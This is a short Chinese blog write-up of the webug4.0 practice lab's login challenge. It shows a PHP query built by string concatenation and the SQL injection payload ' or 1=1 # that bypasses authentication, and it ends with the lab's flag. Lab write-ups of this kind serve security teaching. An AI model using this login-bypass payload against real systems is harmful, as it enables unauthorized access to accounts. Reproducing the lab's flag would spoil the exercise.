webug4.0-万能密码登陆

原创于 2019-09-01 13:58:57 发布 · 1.7k 阅读

CC 4.0 BY-SA版权

31 篇文章

订阅专栏

本文解析了万能密码的原理，通过SQL注入技巧，利用'or1=1#'绕过验证，实现任意登录。并提供了实践案例，展示如何利用此漏洞获取系统权限。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x01 相关知识

1.万能密码原理：

$sql = "SELECT * FROM user WHERE username = '{$username}' AND password = '{$password}'";
$res = $dbConnect->query($sql);

以上就是典型的sql语句，输入 ' or 1=1 # 之后sql语句就变成了：

$sql = "SELECT * FROM user WHERE username = ' 'or 1=1 # ' AND password = ' 'or1=1 # ' ";

0x02 漏洞利用

1. 直接在账号上输入' or 1=1 # 密码随便输入

2.得到flag：htryyujryfhyjtrjn

0x03 结语